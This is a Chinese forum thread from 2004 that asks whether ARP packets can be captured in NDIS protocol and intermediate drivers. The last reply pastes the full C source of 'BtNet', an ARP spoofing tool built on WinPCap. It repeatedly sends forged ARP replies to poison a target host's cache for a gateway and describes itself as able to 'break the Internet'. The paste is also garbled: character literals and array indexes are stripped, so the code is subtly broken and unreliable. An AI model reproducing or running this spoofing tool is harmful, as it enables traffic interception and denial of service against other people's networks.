阅读:1211回复:3
慎重,arp的问题。
在协议驱动程序中,能捕获arp包吗?
在中间驱动程序中,能捕获arp包吗? |
|
最新喜欢:WY.lsl...
|
沙发#
发布于:2004-04-09 17:02
在协议驱动程序中,能捕获arp包吗?
在中间驱动程序中,能捕获arp包吗? 都能! |
|
|
板凳#
发布于:2004-04-09 17:06
不丢包吗?
|
|
|
地板#
发布于:2004-04-12 11:16
首先,能,然后,这是从网上找的arp欺骗的程序,编译的时候总是说少\"packet32.h\"请问高手怎么回事
#include \"packet32.h\" #include \"ntddndis.h\" #include <stdio.h> #include <conio.h> #include <winsock2.h> #include <windows.h> #pragma comment(lib,\"ws2_32\") #pragma comment(lib,\"packet\") #define ETH_IP 0x0800 #define ETH_ARP 0x0806 #define ARP_REQUEST 0x0001 //arp请求包 #define ARP_REPLY 0x0002 //arp应答包 #define ARP_HARDWARE 0x0001 #define max_num_adapter 10 #pragma pack(push,1) typedef struct ethdr { unsigned char eh_dst[6]; //以太网目的地址 unsigned char eh_src[6]; //以太网源地址 unsigned short eh_type; // }ETHDR,*PETHDR; typedef struct arphdr //arp头 { unsigned short arp_hdr; //硬件类型 unsigned short arp_pro; //协议类型 unsigned char arp_hln; //硬件地址长度 unsigned char arp_pln; //协议地址长度 unsigned short arp_opt; // unsigned char arp_sha[6]; //发送端以太网地址 unsigned long arp_spa; //发送端ip地址 unsigned char arp_tha[6]; //接收端以太网地址 unsigned long arp_tpa; //接收端ip地址 }ARPHDR,*PARPHDR; typedef struct ip_mac { u_long ip; unsigned char mac[6]; }IP_MAC,*PIP_MAC; #pragma pack(push) LPADAPTER lpAdapter; char adapterlist[max_num_adapter][1024]; IP_MAC toipandmac; IP_MAC oipandmac,myipandmac; BOOL param6=FALSE; char *noMACstr; char noMAC[6][3]; u_long mytoIP,oIP; BOOL sendtoOip; MSG msg; UINT newtimer; char MYIP[20]=\"128.128.128.128\"; BOOL toipandmac_flag=FALSE,myipandmac_flag=FALSE,oipandmac_flag=FALSE; int getint(char c) { int t=-1; if((c<=9)&&(c>=0)) t=c-0; else if((c>=a)&&(c<=f)) t=10+c-a; else if((c>=A)&&(c<=F)) t=10+c-A; return t; } void start() { printf(\"BtNet //--an ARP Tool test the Windows Break the Internetn\"); printf(\"written by Ruder,10/2003n\"); printf(\"Homepage: http://xEyes.cdut.net/ruder/index.htm;n\"); printf(\"E-mail: cocoruder@163.comn\"); printf(\"nUsage: BtNet -h attackIP -o gateIP [-m spoofedMAC]n\"); printf(\"Example:n\"); printf(\"BtNet -h 202.115.138.12 -o 202.115.138.1n\"); printf(\"BtNet -h 202.115.138.12 -o 202.115.138.1 -m 00-50-fc-6a--6b--7cn\"); printf(\" Warning: You must have installed the winpcap_2.3 or winpcap_3.0_alphan\"); return ; } DWORD WINAPI sniff(LPVOID) { LPPACKET lppackets,lpPacketr; char recvbuf[1024*250]; ULONG ulbytesreceived,off; ETHDR *eth; ARPHDR *arp; char *buf,*pChar,*base; char szTemp[20]; struct bpf_hdr *hdr; if((lppackets=PacketAllocatePacket())==FALSE) { printf(\"PacketAllocatePacket send Error: %dn\",GetLastError()); return 0; } if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE) { printf(\"Warning: Unable to set the adapter to promiscuous moden\"); } if(PacketSetBuff(lpAdapter,500*1024)==FALSE) { printf(\"PacketSetBuff Error: %dn\",GetLastError()); return 0; } if(PacketSetReadTimeout(lpAdapter,1)==FALSE) { printf(\"Warning: Unable to set the timeoutn\"); } if((lpPacketr=PacketAllocatePacket())==FALSE) { printf(\"PacketAllocatePacket receive Error: %dn\",GetLastError()); return 0; } PacketInitPacket(lpPacketr,(char *)recvbuf,sizeof(recvbuf)); while(!kbhit()) { if(PacketReceivePacket(lpAdapter,lpPacketr,TRUE)==FALSE) { return 0; } //getdata(lppacketr,option); ulbytesreceived=lpPacketr->ulBytesReceived; buf=(char *)lpPacketr->Buffer; off=0; while(off<ulbytesreceived) { if(kbhit()) { return 0; } hdr=(struct bpf_hdr *)(buf+off); off+=hdr->bh_hdrlen; pChar=(char *)(buf+off); base=pChar; off=Packet_WORDALIGN(off+hdr->bh_caplen); eth=(PETHDR)pChar; //以太头 arp=(PARPHDR)(pChar+sizeof(ETHDR)); //arp头 int i; if((eth->eh_type==htons(ETH_ARP))&& (arp->arp_opt==htons(ARP_REPLY))) { //if (arp->arp_tpa==htonl(ntohl(inet_addr(MYIP)))) { if(oipandmac_flag&&myipandmac_flag&&toipandmac_flag) return 0; if (((toipandmac.ip==htonl(arp->arp_spa))&&(toipandmac_flag==FALSE)) ||((myipandmac.ip==htonl(arp->arp_spa))&&(myipandmac_flag==FALSE)) ||((oipandmac.ip==htonl(arp->arp_spa))&&(oipandmac_flag==FALSE))) { memset(szTemp,0,sizeof(szTemp)); memcpy(szTemp,&arp->arp_spa,sizeof(arp->arp_spa)); printf(\"[IP]:\"); printf(\"%s\",inet_ntoa(*((struct in_addr *)szTemp))); printf(\"[MAC]:\"); for(i=0;i<5;i++) { printf(\"%.2x-\",eth->eh_src); } printf(\"%.2x\",eth->eh_src[5]); printf(\"n\"); if (toipandmac.ip==htonl(arp->arp_spa)) { for(i=0;i<6;i++) toipandmac.mac=eth->eh_src; toipandmac_flag=TRUE; } if (oipandmac.ip==htonl(arp->arp_spa)) { for(i=0;i<6;i++) oipandmac.mac=eth->eh_src; oipandmac_flag=TRUE; // printf(\"if you have get the MAC Addresses enough,Press any key for staring!n\"); } if(myipandmac.ip==htonl(arp->arp_spa)) { for(i=0;i<6;i++) myipandmac.mac=eth->eh_src; myipandmac_flag=TRUE; } } } } continue; } } return 0; } DWORD WINAPI sendARPPacket(LPVOID dwsendtoIP) { LPPACKET lpPacket; ETHDR eth; ARPHDR arphdr; int i; char szPacketBuf[600]; u_long sendtoIP=*(u_long *)dwsendtoIP; //struct sockaddr_in sin; lpPacket = PacketAllocatePacket(); if(lpPacket==NULL) { printf(\"nPacketAllocatePacket error!\"); return 0; } eth.eh_type=htons(ETH_ARP); for(i=0;i<6;i++) { eth.eh_dst=0xff; eth.eh_src=0xa5; arphdr.arp_sha=0xa5; arphdr.arp_tha=0xff; } arphdr.arp_hdr=htons(ARP_HARDWARE); arphdr.arp_pro=htons(ETH_IP); arphdr.arp_opt=htons(ARP_REQUEST); arphdr.arp_hln=6; arphdr.arp_pln=4; arphdr.arp_tpa=htonl(sendtoIP); arphdr.arp_spa=htonl(ntohl(inet_addr(MYIP))); if(sendtoOip) { if(myipandmac_flag) { for(i=0;i<6;i++) { eth.eh_src=myipandmac.mac; arphdr.arp_sha=myipandmac.mac; arphdr.arp_spa=htonl(myipandmac.ip); //memset(MYIP,0,sizeof(MYIP)); } } else { printf(\"My MAC Address Cant Find!n\"); return 0; } } memset(szPacketBuf,0,sizeof(szPacketBuf)); memcpy(szPacketBuf,e,sizeof(ETHDR)); memcpy(szPacketBuf+sizeof(ETHDR),&arphdr,sizeof(ARPHDR)); PacketInitPacket(lpPacket,szPacketBuf,60); if(PacketSetNumWrites(lpAdapter, 1)==FALSE) { printf(\"warning: Unable to send more than one packet in a single write!n\"); } if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE) { printf(\"Error sending the packets!n\"); PacketFreePacket(lpPacket); return 0; } PacketFreePacket(lpPacket); return 0; } DWORD WINAPI sendSR() { ETHDR eth; ARPHDR arphdr; int i; char szPacketBuf[600]; LPPACKET lpPacket; unsigned char toMAC[6]; struct sockaddr_in sin; u_long toIP=mytoIP; //if ((myipandmac_flag==FALSE)||(oipandmac_flag==FALSE)||(toipandmac_flag==FALSE)) //{ // printf(\"Cant get all MAC address!n\"); // return 0; //} lpPacket = PacketAllocatePacket(); if(lpPacket == NULL) { printf(\"nError:failed to allocate the LPPACKET structure.n\"); return 0; } if (toipandmac_flag==FALSE) { printf(\"Cant get toMAC address!n\"); return 0; } memset(toMAC,0,sizeof(toMAC)); memcpy(toMAC,&toipandmac.mac,sizeof(toipandmac.mac)); if (param6) { for(i=0;i<6;i++) { int t1,t2; char c1,c2; c1=noMAC[0]; c2=noMAC[1]; t1=getint(c1); t2=getint(c2); if((t1==-1)||(t2==-1)) { printf(\"-m parameter error!n\"); return 0; } eth.eh_src=t1*16+t2; eth.eh_dst=toMAC; arphdr.arp_sha=t1*16+t2; arphdr.arp_tha=toMAC; } } else { for(i=0;i<6;i++) { eth.eh_src=toMAC; eth.eh_dst=toMAC; arphdr.arp_sha=toMAC; arphdr.arp_tha=toMAC; } } eth.eh_type=htons(ETH_ARP); arphdr.arp_spa=htonl(oIP); arphdr.arp_tpa=htonl(toIP); arphdr.arp_hdr=htons(ARP_HARDWARE); arphdr.arp_pro=htons(ETH_IP); arphdr.arp_opt=htons(ARP_REPLY); arphdr.arp_hln=6; arphdr.arp_pln=4; memset(szPacketBuf,0,sizeof(szPacketBuf)); memcpy(szPacketBuf,e,sizeof(ETHDR)); memcpy(szPacketBuf+sizeof(ETHDR),&arphdr,sizeof(ARPHDR)); PacketInitPacket(lpPacket,szPacketBuf,60); if(PacketSetNumWrites(lpAdapter, 1)==FALSE) { printf(\"warning: Unable to send more than one packet in a single write!n\"); } if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE) { printf(\"Error sending the packets!n\"); PacketFreePacket(lpPacket); return 0; } PacketFreePacket(lpPacket); sin.sin_addr.s_addr=arphdr.arp_tpa; printf(\"spoof %s: \",inet_ntoa(sin.sin_addr)); sin.sin_addr.s_addr=arphdr.arp_spa; printf(\"%s-->\",inet_ntoa(sin.sin_addr)); for(i=0;i<5;i++) printf(\"%.2x-\",arphdr.arp_sha); printf(\"%x\",arphdr.arp_sha[5]); printf(\"n\"); return 0; } DWORD WINAPI sendSRTimer(LPVOID dwtoIP) { printf(\"Waiting spoof Startn\"); mytoIP=*(u_long *)dwtoIP; newtimer=SetTimer(NULL,NULL,5*1000,TIMERPROC(sendSR)); while(GetMessage(&msg,0,0,0)) { TranslateMessage(&msg); DispatchMessage(&msg); } return 0; } int main(int argc,char *argv[]) { HANDLE thread1,thread2,thread3; WCHAR adaptername[8192]; WCHAR *name1,*name2; ULONG adapterlength; DWORD threadid1,threadid2,threadid3; u_long toIP,myip; struct NetType ntype; struct sockaddr_in sin; struct npf_if_addr ipbuff; int adapternum=0,opti=0,open,i,j; long npflen; if((argc!=5)&&(argc!=7)) { start(); return 0; } else if((strcmp(argv[1],\"-h\")!=0)||(strcmp(argv[3],\"-o\")!=0)) { start(); return 0; } toIP=ntohl(inet_addr(argv[2])); oIP=ntohl(inet_addr(argv[4])); if (argv[5]!=NULL) { if (strcmp(argv[5],\"-m\")==0) { noMACstr=argv[6]; j=0; for(i=0;i<6;i++) { memset(noMAC,0,sizeof(noMAC)); memcpy(noMAC,noMACstr,2); noMACstr=noMACstr+3; } param6=TRUE; } } printf(\"nLibarary Version: %s\",PacketGetVersion()); adapterlength=sizeof(adaptername); if(PacketGetAdapterNames((char *)adaptername,&adapterlength)==FALSE) //得到网卡列表 { printf(\"PacketGetAdapterNames Error: %dn\",GetLastError()); return -1; } name1=adaptername; name2=adaptername; i=0; while((*name1!=) || (*(name1-1)!=)) { if(*name1==) { memcpy(adapterlist,name2,2*(name1-name2)); name2=name1+1; i++; } name1++; } adapternum=i; printf(\"nAdapters Installed:n\"); for(i=0;i<adapternum;i++) wprintf(L\"%d - %sn\",i+1,adapterlist); do { printf(\"nSelect the number of the adapter to open: \"); scanf(\"%d\",&open); if(open>=1 && open<=adapternum) break; }while(open<1 || open>adapternum); lpAdapter=PacketOpenAdapter(adapterlist[open-1]); if(!lpAdapter || (lpAdapter->hFile==INVALID_HANDLE_VALUE)) { printf(\"PacketOpenAdapter Error: %dn\",GetLastError()); return -1; } if(PacketGetNetType(lpAdapter,&ntype)) { printf(\"ntt*** Host Information ***n\"); printf(\"[LinkTpye:]t%dtt\",ntype.LinkType); printf(\"[LinkSpeed:]t%d b/sn\",ntype.LinkSpeed); } npflen=sizeof(ipbuff); if(PacketGetNetInfoEx(adapterlist[open-1],&ipbuff,&npflen)) { sin=*(struct sockaddr_in *)&(ipbuff.Broadcast); printf(\"[Broadcast:]t%.16st\",inet_ntoa(sin.sin_addr)); sin=*(struct sockaddr_in *)&(ipbuff.SubnetMask); printf(\"[SubnetMask:]t%.16sn\",inet_ntoa(sin.sin_addr)); sin=*(struct sockaddr_in *)&(ipbuff.IPAddress); printf(\"[IPAddress:]t%.16st\",inet_ntoa(sin.sin_addr)); myip=ntohl(sin.sin_addr.s_addr); printf(\"[MACAddress:]\"); } else { printf(\"nNot get enough datan\"); //PacketFreePacket(lppackets); PacketCloseAdapter(lpAdapter); return -1; } printf(\"n\"); oipandmac.ip=oIP; toipandmac.ip=toIP; myipandmac.ip=myip; sendtoOip=FALSE; thread1=CreateThread(NULL,0,sniff,NULL,0,&threadid1); Sleep(300); thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&myip,0,&threadid2); Sleep(100); CloseHandle(thread2); thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&toIP,0,&threadid2); Sleep(10); CloseHandle(thread2); sendtoOip=TRUE; Sleep(200); thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&oIP,0,&threadid2); Sleep(10); CloseHandle(thread2); // WaitForSingleObject(thread1,INFINITE); thread3=CreateThread(NULL,0,sendSRTimer,(LPVOID)&toIP,0,&threadid3); WaitForSingleObject(thread3,INFINITE); PacketCloseAdapter(lpAdapter); return 0; } |
|
|